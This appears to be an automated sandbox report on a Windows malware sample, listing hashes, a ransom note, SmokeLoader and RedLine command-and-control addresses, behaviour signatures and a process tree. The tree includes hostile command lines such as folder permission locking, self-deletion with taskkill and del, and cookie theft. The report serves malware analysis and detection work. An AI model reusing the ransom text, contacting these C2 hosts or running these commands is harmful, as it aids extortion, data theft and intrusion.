Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1804s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    09-07-2021 23:00

General

  • Target

    toolspab2 (16).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-mNr1oio2P6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0315ewgfDdSgcyhrmIFKlwG8I3XxekHbYahiFXX0aowKJPQVTk
URLs

https://we.tl/t-mNr1oio2P6

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1

C2

45.32.235.238:45555

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 13 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • Stops running service(s) 3 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 28 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 39 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1944
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2760
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2688
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2672
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2408
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2400
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1412
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1332
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1240
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1108
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        • Modifies registry class
                        PID:412
                        • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                          C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:5072
                          • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                            C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                            3⤵
                            • Executes dropped EXE
                            PID:6496
                        • C:\Users\Admin\AppData\Roaming\cauthjr
                          C:\Users\Admin\AppData\Roaming\cauthjr
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:5388
                          • C:\Users\Admin\AppData\Roaming\cauthjr
                            C:\Users\Admin\AppData\Roaming\cauthjr
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            PID:2236
                        • C:\Users\Admin\AppData\Roaming\seuthjr
                          C:\Users\Admin\AppData\Roaming\seuthjr
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          PID:6784
                        • C:\Users\Admin\AppData\Roaming\reuthjr
                          C:\Users\Admin\AppData\Roaming\reuthjr
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          PID:6984
                        • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                          C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:6060
                          • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                            C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                            3⤵
                            • Executes dropped EXE
                            PID:5924
                        • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                          C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:416
                          • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                            C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                            3⤵
                              PID:6596
                          • C:\Users\Admin\AppData\Roaming\seuthjr
                            C:\Users\Admin\AppData\Roaming\seuthjr
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            PID:5684
                          • C:\Users\Admin\AppData\Roaming\cauthjr
                            C:\Users\Admin\AppData\Roaming\cauthjr
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:4532
                            • C:\Users\Admin\AppData\Roaming\cauthjr
                              C:\Users\Admin\AppData\Roaming\cauthjr
                              3⤵
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              PID:6176
                          • C:\Users\Admin\AppData\Roaming\reuthjr
                            C:\Users\Admin\AppData\Roaming\reuthjr
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            PID:6972
                          • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                            C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:6384
                            • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                              C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                              3⤵
                                PID:640
                            • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                              C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:6364
                              • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                                C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                                3⤵
                                  PID:3636
                              • C:\Users\Admin\AppData\Roaming\seuthjr
                                C:\Users\Admin\AppData\Roaming\seuthjr
                                2⤵
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                PID:5928
                              • C:\Users\Admin\AppData\Roaming\cauthjr
                                C:\Users\Admin\AppData\Roaming\cauthjr
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:4584
                                • C:\Users\Admin\AppData\Roaming\cauthjr
                                  C:\Users\Admin\AppData\Roaming\cauthjr
                                  3⤵
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  PID:5204
                              • C:\Users\Admin\AppData\Roaming\reuthjr
                                C:\Users\Admin\AppData\Roaming\reuthjr
                                2⤵
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                PID:6140
                              • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                                C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:4884
                                • C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe
                                  C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375\16F.exe --Task
                                  3⤵
                                    PID:1048
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                1⤵
                                  PID:68
                                • C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe
                                  "C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"
                                  1⤵
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of WriteProcessMemory
                                  PID:3948
                                  • C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe
                                    "C:\Users\Admin\AppData\Local\Temp\toolspab2 (16).exe"
                                    2⤵
                                    • Loads dropped DLL
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: MapViewOfSection
                                    PID:208
                                • \??\c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                  1⤵
                                  • Suspicious use of SetThreadContext
                                  PID:720
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                    2⤵
                                    • Drops file in System32 directory
                                    • Checks processor information in registry
                                    • Modifies registry class
                                    PID:5140
                                • C:\Users\Admin\AppData\Local\Temp\8F36.exe
                                  C:\Users\Admin\AppData\Local\Temp\8F36.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2680
                                • C:\Users\Admin\AppData\Local\Temp\908E.exe
                                  C:\Users\Admin\AppData\Local\Temp\908E.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1908
                                • C:\Users\Admin\AppData\Local\Temp\937D.exe
                                  C:\Users\Admin\AppData\Local\Temp\937D.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of WriteProcessMemory
                                  PID:1500
                                  • C:\Users\Admin\AppData\Local\Temp\937D.exe
                                    C:\Users\Admin\AppData\Local\Temp\937D.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1556
                                • C:\Users\Admin\AppData\Local\Temp\96BB.exe
                                  C:\Users\Admin\AppData\Local\Temp\96BB.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:3896
                                • C:\Users\Admin\AppData\Local\Temp\98CF.exe
                                  C:\Users\Admin\AppData\Local\Temp\98CF.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:904
                                • C:\Users\Admin\AppData\Local\Temp\9CE7.exe
                                  C:\Users\Admin\AppData\Local\Temp\9CE7.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:1132
                                • C:\Users\Admin\AppData\Local\Temp\A1CA.exe
                                  C:\Users\Admin\AppData\Local\Temp\A1CA.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:816
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:2440
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe
                                    1⤵
                                      PID:3712
                                    • C:\Windows\SysWOW64\explorer.exe
                                      C:\Windows\SysWOW64\explorer.exe
                                      1⤵
                                        PID:4036
                                      • C:\Windows\explorer.exe
                                        C:\Windows\explorer.exe
                                        1⤵
                                        • Suspicious behavior: MapViewOfSection
                                        PID:688
                                      • C:\Windows\SysWOW64\explorer.exe
                                        C:\Windows\SysWOW64\explorer.exe
                                        1⤵
                                          PID:3936
                                        • C:\Windows\explorer.exe
                                          C:\Windows\explorer.exe
                                          1⤵
                                          • Suspicious behavior: MapViewOfSection
                                          PID:1704
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          1⤵
                                            PID:2284
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe
                                            1⤵
                                            • Suspicious behavior: MapViewOfSection
                                            PID:1004
                                          • C:\Windows\SysWOW64\explorer.exe
                                            C:\Windows\SysWOW64\explorer.exe
                                            1⤵
                                              PID:3784
                                            • C:\Users\Admin\AppData\Local\Temp\16F.exe
                                              C:\Users\Admin\AppData\Local\Temp\16F.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4084
                                              • C:\Users\Admin\AppData\Local\Temp\16F.exe
                                                C:\Users\Admin\AppData\Local\Temp\16F.exe
                                                2⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Modifies system certificate store
                                                PID:4004
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Users\Admin\AppData\Local\d76e6945-3406-4fe4-81a8-c0899f2db375" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                  3⤵
                                                  • Modifies file permissions
                                                  PID:3560
                                                • C:\Users\Admin\AppData\Local\Temp\16F.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\16F.exe" --Admin IsNotAutoStart IsNotTask
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4144
                                                  • C:\Users\Admin\AppData\Local\Temp\16F.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\16F.exe" --Admin IsNotAutoStart IsNotTask
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Modifies extensions of user files
                                                    PID:5480
                                                    • C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe
                                                      "C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:5916
                                                      • C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe
                                                        "C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks processor information in registry
                                                        PID:3156
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\c1b666da-42b4-4565-bdbf-0c258e58e563\build2.exe" & del C:\ProgramData\*.dll & exit
                                                          7⤵
                                                            PID:5540
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im build2.exe /f
                                                              8⤵
                                                              • Kills process with taskkill
                                                              PID:4984
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 6
                                                              8⤵
                                                              • Delays execution with timeout.exe
                                                              PID:4572
                                              • C:\Users\Admin\AppData\Local\Temp\B24.exe
                                                C:\Users\Admin\AppData\Local\Temp\B24.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3772
                                              • C:\Users\Admin\AppData\Local\Temp\E23.exe
                                                C:\Users\Admin\AppData\Local\Temp\E23.exe
                                                1⤵
                                                • Executes dropped EXE
                                                PID:3664
                                                • C:\Users\Admin\AppData\Local\Temp\is-K5P5D.tmp\E23.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-K5P5D.tmp\E23.tmp" /SL5="$30118,506127,422400,C:\Users\Admin\AppData\Local\Temp\E23.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:1248
                                                  • C:\Users\Admin\AppData\Local\Temp\is-THDNQ.tmp\1075474_ah_hot_iconçè_)))_.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-THDNQ.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec7
                                                    3⤵
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Drops file in Program Files directory
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2256
                                                    • C:\Program Files\Windows Multimedia Platform\TLJRVISOCO\irecord.exe
                                                      "C:\Program Files\Windows Multimedia Platform\TLJRVISOCO\irecord.exe" /VERYSILENT
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4176
                                                      • C:\Users\Admin\AppData\Local\Temp\is-ILSV2.tmp\irecord.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-ILSV2.tmp\irecord.tmp" /SL5="$20192,5808768,66560,C:\Program Files\Windows Multimedia Platform\TLJRVISOCO\irecord.exe" /VERYSILENT
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:4300
                                                        • C:\Program Files (x86)\i-record\I-Record.exe
                                                          "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:4904
                                                    • C:\Users\Admin\AppData\Local\Temp\e4-0123b-326-a1bbe-e5b53587232db\Nasaesypymu.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\e4-0123b-326-a1bbe-e5b53587232db\Nasaesypymu.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:4244
                                                    • C:\Users\Admin\AppData\Local\Temp\b9-b3905-dde-b2cb9-ed412ad4726d1\Mataexupaty.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\b9-b3905-dde-b2cb9-ed412ad4726d1\Mataexupaty.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4340
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xkjyyixe.lts\GcleanerEU.exe /eufive & exit
                                                        5⤵
                                                          PID:4788
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d4yt0akv.adi\JoSetp.exe & exit
                                                          5⤵
                                                            PID:4896
                                                            • C:\Users\Admin\AppData\Local\Temp\d4yt0akv.adi\JoSetp.exe
                                                              C:\Users\Admin\AppData\Local\Temp\d4yt0akv.adi\JoSetp.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4132
                                                              • C:\Users\Admin\AppData\Roaming\5643095.exe
                                                                "C:\Users\Admin\AppData\Roaming\5643095.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:1128
                                                                • C:\Windows\system32\WerFault.exe
                                                                  C:\Windows\system32\WerFault.exe -u -p 1128 -s 1616
                                                                  8⤵
                                                                  • Program crash
                                                                  PID:5824
                                                              • C:\Users\Admin\AppData\Roaming\7440878.exe
                                                                "C:\Users\Admin\AppData\Roaming\7440878.exe"
                                                                7⤵
                                                                • Adds Run key to start application
                                                                PID:2300
                                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                  8⤵
                                                                    PID:4072
                                                                • C:\Users\Admin\AppData\Roaming\2467453.exe
                                                                  "C:\Users\Admin\AppData\Roaming\2467453.exe"
                                                                  7⤵
                                                                    PID:6076
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2a50f40s.0zb\installer.exe /qn CAMPAIGN="654" & exit
                                                                5⤵
                                                                  PID:4108
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\paj502l2.vha\md6_6ydj.exe & exit
                                                                  5⤵
                                                                    PID:2684
                                                                    • C:\Users\Admin\AppData\Local\Temp\paj502l2.vha\md6_6ydj.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\paj502l2.vha\md6_6ydj.exe
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Checks whether UAC is enabled
                                                                      PID:2808
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\adwnijip.k0d\ufgaa.exe & exit
                                                                    5⤵
                                                                      PID:4360
                                                                      • C:\Users\Admin\AppData\Local\Temp\adwnijip.k0d\ufgaa.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\adwnijip.k0d\ufgaa.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:1836
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5128
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5824
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:4472
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:2732
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe & exit
                                                                        5⤵
                                                                          PID:4184
                                                                          • C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:5704
                                                                            • C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\skbuwbsr.t2a\google-game.exe" -a
                                                                              7⤵
                                                                                PID:5916
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe & exit
                                                                            5⤵
                                                                              PID:5308
                                                                              • C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:5964
                                                                                • C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\psb1cbnt.ib5\app.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:6728
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ojqxqsmb.jit\askinstall46.exe & exit
                                                                              5⤵
                                                                                PID:5728
                                                                                • C:\Users\Admin\AppData\Local\Temp\ojqxqsmb.jit\askinstall46.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\ojqxqsmb.jit\askinstall46.exe
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6128
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                    7⤵
                                                                                      PID:5940
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im chrome.exe
                                                                                        8⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:5188
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iqt4f2st.msg\fa041e8b.exe & exit
                                                                                  5⤵
                                                                                    PID:5560
